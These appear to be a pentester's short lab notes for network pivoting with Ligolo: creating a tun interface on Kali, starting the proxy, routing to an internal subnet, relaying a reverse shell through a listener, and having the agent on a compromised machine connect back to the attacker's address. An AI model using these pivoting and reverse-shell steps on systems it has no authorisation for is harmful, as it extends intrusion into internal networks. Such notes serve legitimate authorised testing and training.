kali:
-> sudo ip tuntap add user kali mode tun ligolo #kali is the username
-> sudo ip link set ligolo up
	-> ip addr show ligolo => to show ip
-> ./proxy -selfcert => run gilolo
-> session
-> hit enter to select the agent
	-> ifconfig => see all ip of pivoting machine

Antoher terminal:
-> sudo ip route add 10.10.0.0/24 dev ligolo

Back to gilogo terminal:
-> start => done

Revershell:
-> listener_add --addr 0.0.0.0:30000 --to 127.0.0.1:1337 --tcp => 1337 is the port to talk to each other

pivot-machine:
-> ./agent -connect 192.168.200.101:11601 -ignore-cert
